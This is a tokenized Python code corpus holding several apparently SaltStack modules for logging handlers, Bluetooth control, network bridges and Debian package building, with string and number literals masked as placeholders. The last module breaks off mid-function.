<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import sys <EOL> import atexit <EOL> import logging <EOL> import threading <EOL> import logging . handlers <EOL> from salt . log . mixins import NewStyleClassMixIn , ExcInfoOnLogLevelFormatMixIn <EOL> log = logging . getLogger ( __name__ ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> class NullHandler ( logging . Handler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> def handle ( self , record ) : <EOL> pass <EOL> def emit ( self , record ) : <EOL> pass <EOL> def createLock ( self ) : <EOL> self . lock = None <EOL> logging . NullHandler = NullHandler <EOL> class TemporaryLoggingHandler ( logging . NullHandler ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , level = logging . NOTSET , max_queue_size = <NUM_LIT> ) : <EOL> self . __max_queue_size = max_queue_size <EOL> super ( TemporaryLoggingHandler , self ) . __init__ ( level = level ) <EOL> self . __messages = [ ] <EOL> def handle ( self , record ) : <EOL> self . acquire ( ) <EOL> if len ( self . __messages ) >= self . __max_queue_size : <EOL> self . __messages . pop ( <NUM_LIT:0> ) <EOL> self . __messages . append ( record ) <EOL> self . release ( ) <EOL> def sync_with_handlers ( self , handlers = ( ) ) : <EOL> '''<STR_LIT>''' <EOL> if not handlers : <EOL> return <EOL> while self . __messages : <EOL> record = self . __messages . pop ( <NUM_LIT:0> ) <EOL> for handler in handlers : <EOL> if handler . level > record . levelno : <EOL> continue <EOL> handler . handle ( record ) <EOL> class StreamHandler ( ExcInfoOnLogLevelFormatMixIn , logging . StreamHandler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> class FileHandler ( ExcInfoOnLogLevelFormatMixIn , logging . FileHandler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> class SysLogHandler ( ExcInfoOnLogLevelFormatMixIn , logging . handlers . SysLogHandler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> if sys . 
version_info > ( <NUM_LIT:2> , <NUM_LIT:6> ) : <EOL> class WatchedFileHandler ( ExcInfoOnLogLevelFormatMixIn , logging . handlers . WatchedFileHandler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:2> ) : <EOL> class QueueHandler ( ExcInfoOnLogLevelFormatMixIn , logging . Handler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , queue ) : <EOL> '''<STR_LIT>''' <EOL> logging . Handler . __init__ ( self ) <EOL> self . queue = queue <EOL> def enqueue ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> self . queue . put_nowait ( record ) <EOL> def prepare ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> self . format ( record ) <EOL> record . msg = record . getMessage ( ) <EOL> record . args = None <EOL> record . exc_info = None <EOL> return record <EOL> def emit ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> self . enqueue ( self . prepare ( record ) ) <EOL> except Exception : <EOL> self . handleError ( record ) <EOL> else : <EOL> class QueueHandler ( ExcInfoOnLogLevelFormatMixIn , logging . handlers . QueueHandler ) : <EOL> pass </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> from salt . ext . six . moves import shlex_quote as _cmd_quote <EOL> import salt . utils . validate . net <EOL> from salt . exceptions import CommandExecutionError <EOL> log = logging . getLogger ( __name__ ) <EOL> HAS_PYBLUEZ = False <EOL> try : <EOL> import bluetooth <EOL> HAS_PYBLUEZ = True <EOL> except ImportError : <EOL> pass <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT:address>' <EOL> } <EOL> __virtualname__ = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if HAS_PYBLUEZ : <EOL> return __virtualname__ <EOL> return ( False , '<STR_LIT>' ) <EOL> def version ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> bluez_version = out [ <NUM_LIT:0> ] <EOL> pybluez_version = '<STR_LIT>' <EOL> try : <EOL> pybluez_version = bluetooth . __version__ <EOL> except Exception as exc : <EOL> pass <EOL> return { '<STR_LIT>' : bluez_version , '<STR_LIT>' : pybluez_version } <EOL> def address_ ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> dev = '<STR_LIT>' <EOL> for line in out : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> comps = line . split ( '<STR_LIT::>' ) <EOL> dev = comps [ <NUM_LIT:0> ] <EOL> ret [ dev ] = { <EOL> '<STR_LIT>' : dev , <EOL> '<STR_LIT:path>' : '<STR_LIT>' . format ( dev ) , <EOL> } <EOL> if '<STR_LIT>' in line : <EOL> comps = line . 
split ( ) <EOL> ret [ dev ] [ '<STR_LIT:address>' ] = comps [ <NUM_LIT:2> ] <EOL> if '<STR_LIT>' in line : <EOL> ret [ dev ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' in line : <EOL> ret [ dev ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return ret <EOL> def power ( dev , mode ) : <EOL> '''<STR_LIT>''' <EOL> if dev not in address_ ( ) : <EOL> raise CommandExecutionError ( '<STR_LIT>' ) <EOL> if mode == '<STR_LIT>' or mode is True : <EOL> state = '<STR_LIT>' <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> state = '<STR_LIT>' <EOL> mode = '<STR_LIT>' <EOL> cmd = '<STR_LIT>' . format ( dev , state ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> info = address_ ( ) <EOL> if info [ dev ] [ '<STR_LIT>' ] == mode : <EOL> return True <EOL> return False <EOL> def discoverable ( dev ) : <EOL> '''<STR_LIT>''' <EOL> if dev not in address_ ( ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cmd = '<STR_LIT>' . format ( dev ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> cmd = '<STR_LIT>' . format ( dev ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> if '<STR_LIT>' in out : <EOL> return True <EOL> return False <EOL> def noscan ( dev ) : <EOL> '''<STR_LIT>''' <EOL> if dev not in address_ ( ) : <EOL> raise CommandExecutionError ( '<STR_LIT>' ) <EOL> cmd = '<STR_LIT>' . format ( dev ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> cmd = '<STR_LIT>' . format ( dev ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> if '<STR_LIT>' in out : <EOL> return False <EOL> return True <EOL> def scan ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = [ ] <EOL> devices = bluetooth . discover_devices ( lookup_names = True ) <EOL> for device in devices : <EOL> ret . append ( { device [ <NUM_LIT:0> ] : device [ <NUM_LIT:1> ] } ) <EOL> return ret <EOL> def block ( bdaddr ) : <EOL> '''<STR_LIT>''' <EOL> if not salt . utils . validate . net . 
mac ( bdaddr ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cmd = '<STR_LIT>' . format ( bdaddr ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> def unblock ( bdaddr ) : <EOL> '''<STR_LIT>''' <EOL> if not salt . utils . validate . net . mac ( bdaddr ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cmd = '<STR_LIT>' . format ( bdaddr ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> def pair ( address , key ) : <EOL> '''<STR_LIT>''' <EOL> if not salt . utils . validate . net . mac ( address ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> try : <EOL> int ( key ) <EOL> except Exception : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> addy = address_ ( ) <EOL> cmd = '<STR_LIT>' . format ( <EOL> _cmd_quote ( addy [ '<STR_LIT>' ] ) , _cmd_quote ( address ) , _cmd_quote ( key ) <EOL> ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = True ) . splitlines ( ) <EOL> return out <EOL> def unpair ( address ) : <EOL> '''<STR_LIT>''' <EOL> if not salt . utils . validate . net . mac ( address ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cmd = '<STR_LIT>' . format ( address ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> return out <EOL> def start ( ) : <EOL> '''<STR_LIT>''' <EOL> out = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> return out <EOL> def stop ( ) : <EOL> '''<STR_LIT>''' <EOL> out = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> return out </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import sys <EOL> import re <EOL> import salt . utils <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT:list>' <EOL> } <EOL> SUPPORTED_BSD_LIKE = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> supported_os_tool = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> cur_os = __grains__ [ '<STR_LIT>' ] <EOL> for _os in supported_os_tool : <EOL> if cur_os == _os and salt . utils . which ( supported_os_tool [ cur_os ] ) : <EOL> return True <EOL> return ( False , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _tool_path ( ostool ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . which ( ostool ) <EOL> def _linux_brshow ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> if br : <EOL> cmd = '<STR_LIT>' . format ( brctl , br ) <EOL> else : <EOL> cmd = '<STR_LIT>' . format ( brctl ) <EOL> brs = { } <EOL> for line in __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) . splitlines ( ) : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> vals = line . split ( ) <EOL> if not vals : <EOL> continue <EOL> if len ( vals ) > <NUM_LIT:1> : <EOL> brname = vals [ <NUM_LIT:0> ] <EOL> brs [ brname ] = { <EOL> '<STR_LIT:id>' : vals [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : vals [ <NUM_LIT:2> ] , <EOL> } <EOL> if len ( vals ) > <NUM_LIT:3> : <EOL> brs [ brname ] [ '<STR_LIT>' ] = [ vals [ <NUM_LIT:3> ] ] <EOL> if len ( vals ) == <NUM_LIT:1> and brname : <EOL> brs [ brname ] [ '<STR_LIT>' ] . append ( vals [ <NUM_LIT:0> ] ) <EOL> if br : <EOL> try : <EOL> return brs [ br ] <EOL> except KeyError : <EOL> return None <EOL> return brs <EOL> def _linux_bradd ( br ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . 
format ( brctl , br ) , <EOL> python_shell = False ) <EOL> def _linux_brdel ( br ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br ) , <EOL> python_shell = False ) <EOL> def _linux_addif ( br , iface ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br , iface ) , <EOL> python_shell = False ) <EOL> def _linux_delif ( br , iface ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br , iface ) , <EOL> python_shell = False ) <EOL> def _linux_stp ( br , state ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br , state ) , <EOL> python_shell = False ) <EOL> def _bsd_brshow ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> if __grains__ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return _netbsd_brshow ( br ) <EOL> ifconfig = _tool_path ( '<STR_LIT>' ) <EOL> ifaces = { } <EOL> if br : <EOL> ifaces [ br ] = br <EOL> else : <EOL> cmd = '<STR_LIT>' . format ( ifconfig ) <EOL> for line in __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) . splitlines ( ) : <EOL> ifaces [ line ] = line <EOL> brs = { } <EOL> for iface in ifaces : <EOL> cmd = '<STR_LIT>' . format ( ifconfig , iface ) <EOL> for line in __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) . splitlines ( ) : <EOL> brs [ iface ] = { <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> line = line . lstrip ( ) <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> brs [ iface ] [ '<STR_LIT>' ] . append ( line . 
split ( '<STR_LIT:U+0020>' ) [ <NUM_LIT:1> ] ) <EOL> if '<STR_LIT>' in line : <EOL> brs [ iface ] [ '<STR_LIT>' ] = '<STR_LIT:yes>' <EOL> if br : <EOL> return brs [ br ] <EOL> return brs <EOL> def _netbsd_brshow ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> brconfig = _tool_path ( '<STR_LIT>' ) <EOL> if br : <EOL> cmd = '<STR_LIT>' . format ( brconfig , br ) <EOL> else : <EOL> cmd = '<STR_LIT>' . format ( brconfig ) <EOL> brs = { } <EOL> start_int = False <EOL> for line in __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) . splitlines ( ) : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> start_int = False <EOL> brname = line . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> brs [ brname ] = { <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> if '<STR_LIT>' in line : <EOL> start_int = True <EOL> continue <EOL> if start_int and brname : <EOL> m = re . match ( r'<STR_LIT>' , line ) <EOL> if m : <EOL> brs [ brname ] [ '<STR_LIT>' ] . append ( m . group ( <NUM_LIT:1> ) ) <EOL> if '<STR_LIT>' in line : <EOL> brs [ brname ] [ '<STR_LIT>' ] = '<STR_LIT:yes>' <EOL> if br : <EOL> try : <EOL> return brs [ br ] <EOL> except KeyError : <EOL> return None <EOL> return brs <EOL> def _bsd_bradd ( br ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> ifconfig = _tool_path ( '<STR_LIT>' ) <EOL> if not br : <EOL> return False <EOL> if __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( ifconfig , br ) , <EOL> python_shell = False ) != <NUM_LIT:0> : <EOL> return False <EOL> if kernel == '<STR_LIT>' : <EOL> brconfig = _tool_path ( '<STR_LIT>' ) <EOL> if __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brconfig , br ) , <EOL> python_shell = False ) != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def _bsd_brdel ( br ) : <EOL> '''<STR_LIT>''' <EOL> ifconfig = _tool_path ( '<STR_LIT>' ) <EOL> if not br : <EOL> return False <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . 
format ( ifconfig , br ) , <EOL> python_shell = False ) <EOL> def _bsd_addif ( br , iface ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> if kernel == '<STR_LIT>' : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> brcmd = '<STR_LIT>' <EOL> else : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> brcmd = '<STR_LIT>' <EOL> if not br or not iface : <EOL> return False <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( cmd , br , brcmd , iface ) , <EOL> python_shell = False ) <EOL> def _bsd_delif ( br , iface ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> if kernel == '<STR_LIT>' : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> brcmd = '<STR_LIT>' <EOL> else : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> brcmd = '<STR_LIT>' <EOL> if not br or not iface : <EOL> return False <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( cmd , br , brcmd , iface ) , <EOL> python_shell = False ) <EOL> def _bsd_stp ( br , state , iface ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> if kernel == '<STR_LIT>' : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> else : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> if not br or not iface : <EOL> return False <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( cmd , br , state , iface ) , <EOL> python_shell = False ) <EOL> def _os_dispatch ( func , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if __grains__ [ '<STR_LIT>' ] in SUPPORTED_BSD_LIKE : <EOL> kernel = '<STR_LIT>' <EOL> else : <EOL> kernel = __grains__ [ '<STR_LIT>' ] . lower ( ) <EOL> _os_func = getattr ( sys . modules [ __name__ ] , '<STR_LIT>' . 
format ( kernel , func ) ) <EOL> if callable ( _os_func ) : <EOL> return _os_func ( * args , ** kwargs ) <EOL> def show ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br ) <EOL> def list_ ( ) : <EOL> '''<STR_LIT>''' <EOL> brs = _os_dispatch ( '<STR_LIT>' ) <EOL> if not brs : <EOL> return None <EOL> brlist = [ ] <EOL> for br in brs : <EOL> brlist . append ( br ) <EOL> return brlist <EOL> def interfaces ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> if not br : <EOL> return None <EOL> br_ret = _os_dispatch ( '<STR_LIT>' , br ) <EOL> if br_ret : <EOL> return br_ret [ '<STR_LIT>' ] <EOL> def find_interfaces ( * args ) : <EOL> '''<STR_LIT>''' <EOL> brs = _os_dispatch ( '<STR_LIT>' ) <EOL> if not brs : <EOL> return None <EOL> iflist = { } <EOL> for iface in args : <EOL> for br in brs : <EOL> try : <EOL> if iface in brs [ br ] [ '<STR_LIT>' ] : <EOL> iflist [ iface ] = br <EOL> except Exception : <EOL> pass <EOL> return iflist <EOL> def add ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br ) <EOL> def delete ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br ) <EOL> def addif ( br = None , iface = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br , iface ) <EOL> def delif ( br = None , iface = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br , iface ) <EOL> def stp ( br = None , state = '<STR_LIT>' , iface = None ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> if kernel == '<STR_LIT>' : <EOL> states = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> return _os_dispatch ( '<STR_LIT>' , br , states [ state ] ) <EOL> elif kernel in SUPPORTED_BSD_LIKE : <EOL> states = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> return _os_dispatch ( '<STR_LIT>' , br , states [ state ] , iface ) <EOL> else : <EOL> return False </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import , print_function <EOL> import errno <EOL> import logging <EOL> import os <EOL> import tempfile <EOL> import shutil <EOL> import salt . utils <EOL> from salt . exceptions import SaltInvocationError <EOL> from salt . ext . six . moves . urllib . parse import urlparse as _urlparse <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtualname__ = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if __grains__ . get ( '<STR_LIT>' , False ) in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return __virtualname__ <EOL> return ( False , '<STR_LIT>' ) <EOL> def _get_build_env ( env ) : <EOL> '''<STR_LIT>''' <EOL> env_override = '<STR_LIT>' <EOL> if env is None : <EOL> return env_override <EOL> if not isinstance ( env , dict ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> for key , value in env . items ( ) : <EOL> env_override += '<STR_LIT>' . format ( key , value ) <EOL> env_override += '<STR_LIT>' . format ( key ) <EOL> return env_override <EOL> def _get_repo_options_env ( env ) : <EOL> '''<STR_LIT>''' <EOL> env_options = '<STR_LIT>' <EOL> if env is None : <EOL> return env_options <EOL> if not isinstance ( env , dict ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> for key , value in env . items ( ) : <EOL> if key == '<STR_LIT>' : <EOL> env_options += '<STR_LIT>' . 
format ( value ) <EOL> return env_options <EOL> def _get_repo_dists_env ( env ) : <EOL> '''<STR_LIT>''' <EOL> dflts_dict = { <EOL> '<STR_LIT>' : ( '<STR_LIT:I>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:M>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:M>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:M>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> env_dists = '<STR_LIT>' <EOL> codename = '<STR_LIT>' <EOL> dflts_keys = list ( dflts_dict . keys ( ) ) <EOL> if env is None : <EOL> for key , value in dflts_dict . items ( ) : <EOL> if dflts_dict [ key ] [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> env_dists += '<STR_LIT>' . format ( dflts_dict [ key ] [ <NUM_LIT:1> ] , dflts_dict [ key ] [ <NUM_LIT:2> ] ) <EOL> if key == '<STR_LIT>' : <EOL> codename = dflts_dict [ key ] [ <NUM_LIT:2> ] <EOL> return ( codename , env_dists ) <EOL> if not isinstance ( env , dict ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> env_man_seen = [ ] <EOL> for key , value in env . items ( ) : <EOL> if key in dflts_keys : <EOL> if dflts_dict [ key ] [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> env_man_seen . append ( key ) <EOL> if key == '<STR_LIT>' : <EOL> codename = value <EOL> if dflts_dict [ key ] [ <NUM_LIT:0> ] != '<STR_LIT:I>' : <EOL> env_dists += '<STR_LIT>' . format ( dflts_dict [ key ] [ <NUM_LIT:1> ] , value ) <EOL> else : <EOL> env_dists += '<STR_LIT>' . format ( key , value ) <EOL> env_keys = list ( env . 
keys ( ) ) <EOL> for key in env_keys : <EOL> if key in dflts_keys and dflts_dict [ key ] [ <NUM_LIT:0> ] == '<STR_LIT:M>' and key not in env_man_seen : <EOL> env_dists += '<STR_LIT>' . format ( dflts_dict [ key ] [ <NUM_LIT:1> ] , dflts_dict [ key ] [ <NUM_LIT:2> ] ) <EOL> if key == '<STR_LIT>' : <EOL> codename = value <EOL> return ( codename , env_dists ) <EOL> def _create_pbuilders ( env ) : <EOL> '''<STR_LIT>''' <EOL> home = os . path . expanduser ( '<STR_LIT>' ) <EOL> pbuilderrc = os . path . join ( home , '<STR_LIT>' ) <EOL> if not os . path . isfile ( pbuilderrc ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> env_overrides = _get_build_env ( env ) <EOL> if env_overrides and not env_overrides . isspace ( ) : <EOL> with salt . utils . fopen ( pbuilderrc , '<STR_LIT:a>' ) as fow : <EOL> fow . write ( '<STR_LIT>' . format ( env_overrides ) ) <EOL> def _mk_tree ( ) : <EOL> '''<STR_LIT>''' <EOL> basedir = tempfile . mkdtemp ( ) <EOL> return basedir <EOL> def _get_spec ( tree_base , spec , template , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> spec_tgt = os . path . basename ( spec ) <EOL> dest = os . path . join ( tree_base , spec_tgt ) <EOL> return __salt__ [ '<STR_LIT>' ] ( spec , dest , saltenv = saltenv ) <EOL> def _get_src ( tree_base , source , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> parsed = _urlparse ( source ) <EOL> sbase = os . path . basename ( source ) <EOL> dest = os . path . join ( tree_base , sbase ) <EOL> if parsed . scheme : <EOL> __salt__ [ '<STR_LIT>' ] ( source , dest , saltenv = saltenv ) <EOL> else : <EOL> shutil . copy ( source , dest ) <EOL> def make_src_pkg ( dest_dir , spec , sources , env = None , template = None , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> _create_pbuilders ( env ) <EOL> tree_base = _mk_tree ( ) <EOL> ret = [ ] <EOL> if not os . path . isdir ( dest_dir ) : <EOL> os . 
makedirs ( dest_dir ) <EOL> spec_pathfile = _get_spec ( tree_base , spec , template , saltenv ) <EOL> if isinstance ( sources , str ) : <EOL> sources = sources . split ( '<STR_LIT:U+002C>' ) <EOL> for src in sources : <EOL> _get_src ( tree_base , src , saltenv ) <EOL> if spec_pathfile . endswith ( '<STR_LIT>' ) : <EOL> for efile in os . listdir ( tree_base ) : <EOL> full = os . path . join ( tree_base , efile ) <EOL> trgt = os . path . join ( dest_dir , efile ) <EOL> shutil . copy ( full , trgt ) <EOL> ret . append ( trgt ) <EOL> trgt = os . path . join ( dest_dir , os . path . basename ( spec_pathfile ) ) <EOL> shutil . copy ( spec_pathfile , trgt ) <EOL> ret . append ( trgt ) <EOL> return ret <EOL> salttarball = None <EOL> for afile in os . listdir ( tree_base ) : <EOL> if afile . startswith ( '<STR_LIT>' ) and afile . endswith ( '<STR_LIT>' ) : <EOL> salttarball = afile <EOL> break <EOL> else : <EOL> return ret <EOL> frontname = salttarball . split ( '<STR_LIT>' ) <EOL> salttar_name = frontname [ <NUM_LIT:0> ] <EOL> k = salttar_name . rfind ( '<STR_LIT:->' ) <EOL> debname = salttar_name [ : k ] + '<STR_LIT:_>' + salttar_name [ k + <NUM_LIT:1> : ] <EOL> debname += '<STR_LIT>' <EOL> debname_orig = debname + '<STR_LIT>' <EOL> abspath_debname = os . path . join ( tree_base , debname ) <EOL> cmd = '<STR_LIT>' . format ( salttarball ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = tree_base ) <EOL> cmd = '<STR_LIT>' . format ( salttar_name , debname ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = tree_base ) <EOL> cmd = '<STR_LIT>' . format ( os . path . join ( tree_base , debname_orig ) , debname ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = tree_base ) <EOL> cmd = '<STR_LIT>' . format ( salttarball ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = tree_base ) <EOL> cmd = '<STR_LIT>' . format ( spec_pathfile , abspath_debname ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = abspath_debname ) <EOL> cmd = '<STR_LIT>' . 
format ( spec_pathfile ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = abspath_debname ) <EOL> cmd = '<STR_LIT>' . format ( os . path . basename ( spec_pathfile ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = abspath_debname ) <EOL> cmd = '<STR_LIT>' <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = abspath_debname , python_shell = True ) <EOL> cmd = '<STR_LIT>' . format ( abspath_debname ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> for dfile in os . listdir ( tree_base ) : <EOL> if not dfile . endswith ( '<STR_LIT>' ) : <EOL> full = os . path . join ( tree_base , dfile ) <EOL> trgt = os . path . join ( dest_dir , dfile ) <EOL> shutil . copy ( full , trgt ) <EOL> ret . append ( trgt ) <EOL> return ret <EOL> def build ( runas , <EOL> tgt , <EOL> dest_dir , <EOL> spec , <EOL> sources , <EOL> deps , <EOL> env , <EOL> template , <EOL> saltenv = '<STR_LIT>' , <EOL> log_dir = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> try : <EOL> os . makedirs ( dest_dir ) <EOL> except OSError as exc : 